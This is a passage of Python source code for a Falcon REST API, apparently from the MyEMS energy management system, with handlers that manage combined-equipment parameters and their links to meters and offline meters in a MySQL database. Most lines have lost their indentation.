virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, parameter_type, "
" constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s "
" ORDER BY id ")
cursor.execute(query, (id_, ))
rows_parameters = cursor.fetchall()
result = list()
if rows_parameters is not None and len(rows_parameters) > 0:
for row in rows_parameters:
constant = None
point = None
numerator_meter = None
denominator_meter = None
if row['parameter_type'] == 'point':
point = point_dict.get(row['point_id'], None)
constant = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'constant':
constant = row['constant']
point = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'fraction':
constant = None
point = None
# find numerator meter by uuid
numerator_meter = meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = virtual_meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = offline_meter_dict.get(row['numerator_meter_uuid'], None)
# find denominator meter by uuid
denominator_meter = meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = virtual_meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = offline_meter_dict.get(row['denominator_meter_uuid'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"parameter_type": row['parameter_type'],
"constant": constant,
"point": point,
"numerator_meter": numerator_meter,
"denominator_meter": denominator_meter}
result.append(meta_result)
cursor.close()
cnx.disconnect()
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=str(ex))
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_NAME')
name = str.strip(new_values['data']['name'])
if 'parameter_type' not in new_values['data'].keys() or \
not isinstance(new_values['data']['parameter_type'], str) or \
len(str.strip(new_values['data']['parameter_type'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
parameter_type = str.strip(new_values['data']['parameter_type'])
if parameter_type not in ('constant', 'point', 'fraction'):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
constant = None
if 'constant' in new_values['data'].keys():
if new_values['data']['constant'] is not None and \
isinstance(new_values['data']['constant'], str) and \
len(str.strip(new_values['data']['constant'])) > 0:
constant = str.strip(new_values['data']['constant'])
        point_id = None
        if 'point_id' in new_values['data'].keys():
            if new_values['data']['point_id'] is not None and \
                    (not isinstance(new_values['data']['point_id'], int) or
                     new_values['data']['point_id'] <= 0):
                raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
                                       description='API.INVALID_POINT_ID')
            point_id = new_values['data']['point_id']
numerator_meter_uuid = None
if 'numerator_meter_uuid' in new_values['data'].keys():
if new_values['data']['numerator_meter_uuid'] is not None and \
isinstance(new_values['data']['numerator_meter_uuid'], str) and \
len(str.strip(new_values['data']['numerator_meter_uuid'])) > 0:
numerator_meter_uuid = str.strip(new_values['data']['numerator_meter_uuid'])
denominator_meter_uuid = None
if 'denominator_meter_uuid' in new_values['data'].keys():
if new_values['data']['denominator_meter_uuid'] is not None and \
isinstance(new_values['data']['denominator_meter_uuid'], str) and \
len(str.strip(new_values['data']['denominator_meter_uuid'])) > 0:
denominator_meter_uuid = str.strip(new_values['data']['denominator_meter_uuid'])
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
            raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
                                   description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE name = %s AND combined_equipment_id = %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_PARAMETER_NAME_IS_ALREADY_IN_USE')
# validate by parameter type
if parameter_type == 'point':
if point_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
query = (" SELECT id, name "
" FROM tbl_points "
" WHERE id = %s ")
cursor.execute(query, (point_id, ))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.POINT_NOT_FOUND')
elif parameter_type == 'constant':
if constant is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONSTANT_VALUE')
elif parameter_type == 'fraction':
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
# validate numerator meter uuid
if meter_dict.get(numerator_meter_uuid) is None and \
virtual_meter_dict.get(numerator_meter_uuid) is None and \
offline_meter_dict.get(numerator_meter_uuid) is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_NUMERATOR_METER_UUID')
# validate denominator meter uuid
if denominator_meter_uuid == numerator_meter_uuid:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
if denominator_meter_uuid not in meter_dict and \
denominator_meter_uuid not in virtual_meter_dict and \
denominator_meter_uuid not in offline_meter_dict:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
add_values = (" INSERT INTO tbl_combined_equipments_parameters "
" (combined_equipment_id, name, parameter_type, constant, "
" point_id, numerator_meter_uuid, denominator_meter_uuid) "
" VALUES (%s, %s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (id_,
name,
parameter_type,
constant,
point_id,
numerator_meter_uuid,
denominator_meter_uuid))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
        resp.location = '/combinedequipments/' + str(id_) + '/parameters/' + str(new_id)
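    # Example request bodies for the POST handler above (illustrative values;
    # the meter UUIDs are placeholders, not real ones):
    #     {"data": {"name": "rated power", "parameter_type": "constant",
    #               "constant": "100 kW"}}
    #     {"data": {"name": "supply temperature", "parameter_type": "point",
    #               "point_id": 5}}
    #     {"data": {"name": "COP", "parameter_type": "fraction",
    #               "numerator_meter_uuid": "<meter-uuid>",
    #               "denominator_meter_uuid": "<another-meter-uuid>"}}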
class CombinedEquipmentParameterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentParameterItem"""
pass
@staticmethod
def on_options(req, resp, id_, pid):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_, pid):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name "
" FROM tbl_points ")
cursor.execute(query)
rows_points = cursor.fetchall()
point_dict = dict()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_dict[row['id']] = {"id": row['id'],
"name": row['name']}
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, parameter_type, "
" constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ")
cursor.execute(query, (id_, pid))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
else:
constant = None
point = None
numerator_meter = None
denominator_meter = None
if row['parameter_type'] == 'point':
point = point_dict.get(row['point_id'], None)
constant = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'constant':
constant = row['constant']
point = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'fraction':
constant = None
point = None
# find numerator meter by uuid
numerator_meter = meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = virtual_meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = offline_meter_dict.get(row['numerator_meter_uuid'], None)
# find denominator meter by uuid
denominator_meter = meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = virtual_meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = offline_meter_dict.get(row['denominator_meter_uuid'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"parameter_type": row['parameter_type'],
"constant": constant,
"point": point,
"numerator_meter": numerator_meter,
"denominator_meter": denominator_meter}
resp.text = json.dumps(meta_result)
@staticmethod
@user_logger
def on_delete(req, resp, id_, pid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ",
(id_,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
            raise falcon.HTTPError(falcon.HTTP_404,
                                   title='API.NOT_FOUND',
                                   description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ",
(id_, pid,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
            raise falcon.HTTPError(falcon.HTTP_404,
                                   title='API.NOT_FOUND',
                                   description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
cursor.execute(" DELETE FROM tbl_combined_equipments_parameters "
" WHERE id = %s ", (pid, ))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
@user_logger
def on_put(req, resp, id_, pid):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=str(ex))
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_NAME')
name = str.strip(new_values['data']['name'])
if 'parameter_type' not in new_values['data'].keys() or \
not isinstance(new_values['data']['parameter_type'], str) or \
len(str.strip(new_values['data']['parameter_type'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
parameter_type = str.strip(new_values['data']['parameter_type'])
if parameter_type not in ('constant', 'point', 'fraction'):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
constant = None
if 'constant' in new_values['data'].keys():
if new_values['data']['constant'] is not None and \
isinstance(new_values['data']['constant'], str) and \
len(str.strip(new_values['data']['constant'])) > 0:
constant = str.strip(new_values['data']['constant'])
        point_id = None
        if 'point_id' in new_values['data'].keys():
            if new_values['data']['point_id'] is not None and \
                    (not isinstance(new_values['data']['point_id'], int) or
                     new_values['data']['point_id'] <= 0):
                raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
                                       description='API.INVALID_POINT_ID')
            point_id = new_values['data']['point_id']
numerator_meter_uuid = None
if 'numerator_meter_uuid' in new_values['data'].keys():
if new_values['data']['numerator_meter_uuid'] is not None and \
isinstance(new_values['data']['numerator_meter_uuid'], str) and \
len(str.strip(new_values['data']['numerator_meter_uuid'])) > 0:
numerator_meter_uuid = str.strip(new_values['data']['numerator_meter_uuid'])
denominator_meter_uuid = None
if 'denominator_meter_uuid' in new_values['data'].keys():
if new_values['data']['denominator_meter_uuid'] is not None and \
isinstance(new_values['data']['denominator_meter_uuid'], str) and \
len(str.strip(new_values['data']['denominator_meter_uuid'])) > 0:
denominator_meter_uuid = str.strip(new_values['data']['denominator_meter_uuid'])
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
            raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
                                   description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ",
(id_, pid,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
            raise falcon.HTTPError(falcon.HTTP_404,
                                   title='API.NOT_FOUND',
                                   description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE name = %s AND combined_equipment_id = %s AND id != %s ", (name, id_, pid))
row = cursor.fetchone()
if row is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_PARAMETER_NAME_IS_ALREADY_IN_USE')
# validate by parameter type
if parameter_type == 'point':
if point_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
query = (" SELECT id, name "
" FROM tbl_points "
" WHERE id = %s ")
cursor.execute(query, (point_id, ))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.POINT_NOT_FOUND')
elif parameter_type == 'constant':
if constant is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONSTANT_VALUE')
elif parameter_type == 'fraction':
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
# validate numerator meter uuid
if meter_dict.get(numerator_meter_uuid) is None and \
virtual_meter_dict.get(numerator_meter_uuid) is None and \
offline_meter_dict.get(numerator_meter_uuid) is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_NUMERATOR_METER_UUID')
# validate denominator meter uuid
if denominator_meter_uuid == numerator_meter_uuid:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
if denominator_meter_uuid not in meter_dict and \
denominator_meter_uuid not in virtual_meter_dict and \
denominator_meter_uuid not in offline_meter_dict:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
add_values = (" UPDATE tbl_combined_equipments_parameters "
" SET name = %s , parameter_type = %s, constant = %s, "
" point_id = %s, numerator_meter_uuid = %s, denominator_meter_uuid =%s "
" WHERE id = %s ")
cursor.execute(add_values, (name,
parameter_type,
constant,
point_id,
numerator_meter_uuid,
denominator_meter_uuid,
pid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
class CombinedEquipmentMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_meters em, tbl_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
        cursor.close()
        cnx.disconnect()
        resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['meter_id'], int) or \
new_values['data']['meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_METER_ID')
meter_id = new_values['data']['meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_meters "
" WHERE id = %s ", (meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s")
cursor.execute(query, (id_, meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_meters (combined_equipment_id, meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
cursor.execute(add_row, (id_, meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/meters/' + str(meter_id)
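    # Example request body for the POST handler above (illustrative):
    #     {"data": {"meter_id": 5, "is_output": false}}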
class CombinedEquipmentMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentOfflineMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentOfflineMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_offline_meters em, tbl_offline_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.offline_meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
        cursor.close()
        cnx.disconnect()
        resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'offline_meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['offline_meter_id'], int) or \
new_values['data']['offline_meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_OFFLINE_METER_ID')
offline_meter_id = new_values['data']['offline_meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_offline_meters "
" WHERE id = %s ", (offline_meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.OFFLINE_METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s")
cursor.execute(query, (id_, offline_meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_OFFLINE_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_offline_meters "
" (combined_equipment_id, offline_meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
